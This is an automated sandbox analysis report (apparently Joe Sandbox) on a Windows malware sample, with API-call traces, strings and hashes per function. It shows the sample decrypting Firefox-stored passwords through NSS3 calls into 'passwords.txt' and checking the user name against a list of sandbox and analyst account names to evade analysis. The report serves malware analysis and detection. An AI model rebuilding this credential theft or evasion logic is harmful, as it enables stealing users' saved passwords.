String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
API String ID: 1427204090-154007103
Opcode ID: 7c0209f64ac2569a97a5597efb6889fbd0845ef6d484f9c116200ee560ce2172
Instruction ID: 260a9561a45e90322e6e67331f5371150968557d2170277fdea4f6b0905436b5
Opcode Fuzzy Hash: 7c0209f64ac2569a97a5597efb6889fbd0845ef6d484f9c116200ee560ce2172
Instruction Fuzzy Hash: 4191D2F0A042155BFF11DF249C85FAA3BA4DF0528EF288064EC59DBB42E725D905C7A2

Function 0061B85F Relevance: 61.5, APIs: 34, Strings: 1, Instructions: 211stringmemoryfileCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061B86B

Part of subcall function 00622143: lstrcpyA.KERNEL32(00000000,00000000,?,00628FC1,00647786,?,?,?,?,00629D6E), ref: 00622169

Part of subcall function 00622223: lstrcpyA.KERNEL32(00000000,?,0000000C,00629228,00647803), ref: 00622251
Part of subcall function 00622223: lstrcatA.KERNEL32(?,?), ref: 0062225B

Part of subcall function 006221E9: lstrcpyA.KERNEL32(00000000,?,?,00628FEB,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622219

Part of subcall function 00622265: lstrlenA.KERNEL32(?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 00622279
Part of subcall function 00622265: lstrcpyA.KERNEL32(00000000,?,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222A1
Part of subcall function 00622265: lstrcatA.KERNEL32(?,00000000,?,?,00628FD9,abc_,00000000,00647786,?,?,?,?,00629D6E), ref: 006222AC

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,0064856C,0064788B), ref: 0061B90A
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061B922
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061B92A
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061B936
??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061B940
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061B952
GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061B95E
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061B965
StrStrA.SHLWAPI(0061C76D,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061B976
StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061B990
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061B9A3
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061B9AD
lstrcatA.KERNEL32(00000000,00648570,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061B9B9
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061B9C3
lstrcatA.KERNEL32(00000000,00648574,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061B9CF
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061B9DC
lstrcatA.KERNEL32(00000000,-00000010,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061B9E4
lstrcatA.KERNEL32(00000000,00648578,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061B9F0
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061BA00
StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061BA10
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061BA23

Part of subcall function 0061B721: _memset.LIBCMT ref: 0061B75E
Part of subcall function 0061B721: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0061BA30), ref: 0061B779
Part of subcall function 0061B721: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0061B781
Part of subcall function 0061B721: PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0061BA30), ref: 0061B78F
Part of subcall function 0061B721: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0061BA30), ref: 0061B7A3
Part of subcall function 0061B721: PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0061BA30), ref: 0061B7E3
Part of subcall function 0061B721: _memmove.LIBCMT ref: 0061B804
Part of subcall function 0061B721: PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061B835

lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061BA32
lstrcatA.KERNEL32(00000000,0064857C,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061BA3E
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061BA4E
StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061BA5E
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061BA71

Part of subcall function 0061B721: lstrcatA.KERNEL32(00647883,00647887,?,00000000,00000000,00000000,00000000,00000014,?,0061BA30), ref: 0061B82E
Part of subcall function 0061B721: lstrcatA.KERNEL32(00647883,0064788A,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0061BA30), ref: 0061B844

lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061BA80
lstrcatA.KERNEL32(00000000,00648580,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061BA8C
lstrcatA.KERNEL32(00000000,00648584,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061BA98
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061BAA8
lstrlenA.KERNEL32(00000000), ref: 0061BAC6
CloseHandle.KERNEL32(?), ref: 0061BAF5
NSS_Shutdown.NSS3(?,?,?,?,?,?,?,?,?,?,0061C76D), ref: 0061BAFB

Strings

passwords.txt, xrefs: 0061BAD2

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$lstrcpy$K11_lstrlen$HeapPointerSlot$AllocAuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalProcessReadShutdownSizeString_memmove_memset
String ID: passwords.txt
API String ID: 2725232238-347816968
Opcode ID: 9ebae406f1595757c220db1db6409aefb7f3c5ee8b2d10745435959864c2e476
Instruction ID: 6f9ada42a20fe33b843ae00b8f1de2d78b97f0e5f76e93a4da6e4db7aae2b46a
Opcode Fuzzy Hash: 9ebae406f1595757c220db1db6409aefb7f3c5ee8b2d10745435959864c2e476
Instruction Fuzzy Hash: 9D71AC32541A15AFCB41BBB5ED4EDDE7B7AFF4A302B044414FA01A31A1CF396A51CBA4

Function 6C3D1D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON

Download Yara Rule

APIs

PR_NewLock.NSS3 ref: 6C3D1DA3

Part of subcall function 6C4A98D0: calloc.MOZGLUE(00000001,00000084,6C3D0936,00000001,?,6C3D102C), ref: 6C4A98E5

PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6C3D1DB2

Part of subcall function 6C3D1240: TlsGetValue.KERNEL32(00000040,?,6C3D116C,NSPR_LOG_MODULES), ref: 6C3D1267
Part of subcall function 6C3D1240: EnterCriticalSection.KERNEL32(?,?,?,6C3D116C,NSPR_LOG_MODULES), ref: 6C3D127C
Part of subcall function 6C3D1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C3D116C,NSPR_LOG_MODULES), ref: 6C3D1291
Part of subcall function 6C3D1240: PR_Unlock.NSS3(?,?,?,?,6C3D116C,NSPR_LOG_MODULES), ref: 6C3D12A0

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C3D1DD8
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6C3D1E4F
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6C3D1EA4
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6C3D1ECD
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6C3D1EEF
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6C3D1F17
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C3D1F34
PR_SetLogBuffering.NSS3(00004000), ref: 6C3D1F61
PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6C3D1F6E
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C3D1F83
PR_SetLogFile.NSS3(00000000), ref: 6C3D1FA2
PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6C3D1FB8
OutputDebugStringA.KERNEL32(00000000), ref: 6C3D1FCB
free.MOZGLUE(00000000), ref: 6C3D1FD2

Strings

all, xrefs: 6C3D1F0E
NSPR_LOG_MODULES, xrefs: 6C3D1DAD
sync, xrefs: 6C3D1E46
append, xrefs: 6C3D1EE6
bufsize, xrefs: 6C3D1E9B
Unable to create nspr log file '%s', xrefs: 6C3D1FB3
%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n, xrefs: 6C3D1E27
, %n, xrefs: 6C3D1E6B
NSPR_LOG_FILE, xrefs: 6C3D1F69
timestamp, xrefs: 6C3D1EC4

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
API String ID: 2013311973-4000297177
Opcode ID: febc63b954eee867a79702087ca0c87eca1e1c442d92cbfbc6584931b8247eea
Instruction ID: 61ea50690a91b050e556aaa1d9f3cfe04cb3e451d3b8d13de657537e18cf3e3d
Opcode Fuzzy Hash: febc63b954eee867a79702087ca0c87eca1e1c442d92cbfbc6584931b8247eea
Instruction Fuzzy Hash: 5A5170B2E042599BEF00DBE5CC48A9E77B8AF01318F050628E8199BA44F775F518CB96

Function 00636397 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 0063639F
__mtterm.LIBCMT ref: 006363AB

Part of subcall function 0063606A: DecodePointer.KERNEL32(FFFFFFFF), ref: 0063607B
Part of subcall function 0063606A: TlsFree.KERNEL32(FFFFFFFF), ref: 00636095

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 006363C1
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 006363CE
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 006363DB
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 006363E8
TlsAlloc.KERNEL32 ref: 00636438
TlsSetValue.KERNEL32(00000000), ref: 00636453
__init_pointers.LIBCMT ref: 0063645D
EncodePointer.KERNEL32 ref: 0063646E
EncodePointer.KERNEL32 ref: 0063647B
EncodePointer.KERNEL32 ref: 00636488
EncodePointer.KERNEL32 ref: 00636495
DecodePointer.KERNEL32(Function_000261EE), ref: 006364B6
__calloc_crt.LIBCMT ref: 006364CB
DecodePointer.KERNEL32(00000000), ref: 006364E5
__initptd.LIBCMT ref: 006364F0
GetCurrentThreadId.KERNEL32 ref: 006364F7

Strings

FlsGetValue, xrefs: 006363C3
KERNEL32.DLL, xrefs: 0063639A
FlsAlloc, xrefs: 006363BB
FlsFree, xrefs: 006363DD
FlsSetValue, xrefs: 006363D0

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3732613303-3819984048
Opcode ID: 0bb7e5f9e640a9ecec7c9293c82715cb5e200509ea7c0b83e7001e7d3aef52b6
Instruction ID: 380a63594fab20e04842167ee6acad4f00ce11a36b2c26bedc302ce5b0b0753f
Opcode Fuzzy Hash: 0bb7e5f9e640a9ecec7c9293c82715cb5e200509ea7c0b83e7001e7d3aef52b6
Instruction Fuzzy Hash: 61315A35A00311ABDB25AF74EC09B863EE3EB47766F10692AF4109B2B1DB71D440CF90

Function 6C444C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C434F51,00000000), ref: 6C444C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C434F51,00000000), ref: 6C444C5B
PR_smprintf.NSS3(6C51AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C434F51,00000000), ref: 6C444C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C434F51,00000000), ref: 6C444CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C444CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C444CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C444D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C434F51,00000000), ref: 6C444D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C434F51,00000000), ref: 6C444D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C444D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C444DA2
free.MOZGLUE(?), ref: 6C444DB9
free.MOZGLUE(00000000), ref: 6C444DCF

Strings

any, xrefs: 6C444C96
0x%08lx=[%s %s], xrefs: 6C444D80
ootT, xrefs: 6C444D1A
timeout, xrefs: 6C444C91
%s,%s, xrefs: 6C444C4B
slotFlags, xrefs: 6C444D34
every, xrefs: 6C444CA1
rust, xrefs: 6C444D22
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C444D9D
rootFlags, xrefs: 6C444D47

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: 58641906e4b82c3ac28ebb6a995e3b4ea7664b7cf07eb6f96d4298bf6a44d6db
Instruction ID: f6c278dd4b1e4d74b8fabaf60320401da99a8ab1ec2b8c6a28729c00051714d3
Opcode Fuzzy Hash: 58641906e4b82c3ac28ebb6a995e3b4ea7664b7cf07eb6f96d4298bf6a44d6db
Instruction Fuzzy Hash: D94179F190014167F712DF149C84EBE3AA5EB92389F298128E8194BB01E735D925C7D7

Function 6C426CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C426910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C426943
Part of subcall function 6C426910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C426957
Part of subcall function 6C426910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C426972
Part of subcall function 6C426910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C426983
Part of subcall function 6C426910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C4269AA
Part of subcall function 6C426910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C4269BE
Part of subcall function 6C426910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C4269D2
Part of subcall function 6C426910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C4269DF
Part of subcall function 6C426910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C426A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C426D8C
free.MOZGLUE(00000000), ref: 6C426DC5
free.MOZGLUE(?), ref: 6C426DD6
free.MOZGLUE(?), ref: 6C426DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C426E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C426E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C426E72
free.MOZGLUE(?), ref: 6C426EA7
free.MOZGLUE(?), ref: 6C426EC4
free.MOZGLUE(?), ref: 6C426ED5
free.MOZGLUE(00000000), ref: 6C426EE3
free.MOZGLUE(?), ref: 6C426EF4
free.MOZGLUE(?), ref: 6C426F08
free.MOZGLUE(00000000), ref: 6C426F35
free.MOZGLUE(?), ref: 6C426F44
free.MOZGLUE(?), ref: 6C426F5B
free.MOZGLUE(00000000), ref: 6C426F65

Part of subcall function 6C426C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C42781D,00000000,6C41BE2C,?,6C426B1D,?,?,?,?,00000000,00000000,6C42781D), ref: 6C426C40
Part of subcall function 6C426C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C42781D,?,6C41BE2C,?), ref: 6C426C58
Part of subcall function 6C426C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C42781D), ref: 6C426C6F
Part of subcall function 6C426C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C426C84
Part of subcall function 6C426C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C426C96
Part of subcall function 6C426C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C426CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C426F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C426FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C426FF4

Strings

+`Cl, xrefs: 6C426D0D

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: +`Cl
API String ID: 1304971872-2179993014
Opcode ID: 5443809d9b172e44fecda0a22aa8105ebb9c2cc02e46fc72e4813dba172d7449
Instruction ID: b5a0beb0c3042865b71b432004a5986ff7b0c8fec07ec131748a8eae54c23337
Opcode Fuzzy Hash: 5443809d9b172e44fecda0a22aa8105ebb9c2cc02e46fc72e4813dba172d7449
Instruction Fuzzy Hash: CAB170B0E012199FDF10DBA5D886FDEBBB4AF0434AF150124E819E7741E739E915CBA1

Function 00611917 Relevance: 36.8, APIs: 2, Strings: 19, Instructions: 56stringCOMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00611A03
lstrcmpiA.KERNEL32(0064BDEC,?), ref: 00611A1E

Strings

Hong Lee, xrefs: 00611963
sandbox, xrefs: 006119B3
IT-ADMIN, xrefs: 0061196D
WDAGUtilityAccount, xrefs: 006119EF
virus, xrefs: 006119DB
maltest, xrefs: 006119C7
Peter Wilson, xrefs: 00611995
Miller, xrefs: 00611981
milozs, xrefs: 0061198B
Emily, xrefs: 0061194F
Johnson, xrefs: 00611977
John Doe, xrefs: 006119E5
timmy, xrefs: 0061199F
HAPUBWS, xrefs: 00611959
test user, xrefs: 006119D1
malware, xrefs: 006119BD
user, xrefs: 006119A9
CurrentUser, xrefs: 0061193B
Sand box, xrefs: 00611945

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: NameUserlstrcmpi
String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
API String ID: 542268695-1784693376
Opcode ID: 71427a4d82bfb38a19b99adb51828cc862aaba4a386af77d7b1ca9aa7d224526
Instruction ID: 170f68dea794814cb4da41ced3e0d0a8bfbd529cd8e95b2ba85cb9ce20d0d111
Opcode Fuzzy Hash: 71427a4d82bfb38a19b99adb51828cc862aaba4a386af77d7b1ca9aa7d224526
Instruction Fuzzy Hash: 1F21DFB190126CCBCB60DF55DC486D9BFB6AB86788F4061D886496A210C7B08EC9CF84

Function 6C3EDDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C3EDDDE

Part of subcall function 6C440FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C3E87ED,00000800,6C3DEF74,00000000), ref: 6C441000
Part of subcall function 6C440FF0: PR_NewLock.NSS3(?,00000800,6C3DEF74,00000000), ref: 6C441016
Part of subcall function 6C440FF0: PL_InitArenaPool.NSS3(00000000,security,6C3E87ED,00000008,?,00000800,6C3DEF74,00000000), ref: 6C44102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C3EDDF5

Part of subcall function 6C4410C0: TlsGetValue.KERNEL32(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C4410F3
Part of subcall function 6C4410C0: EnterCriticalSection.KERNEL32(?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44110C
Part of subcall function 6C4410C0: PL_ArenaAllocate.NSS3(?,?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C441141
Part of subcall function 6C4410C0: PR_Unlock.NSS3(?,?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C441182
Part of subcall function 6C4410C0: TlsGetValue.KERNEL32(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44119C

PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C3EDE34
PR_Now.NSS3 ref: 6C3EDE93
CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6C3EDE9D
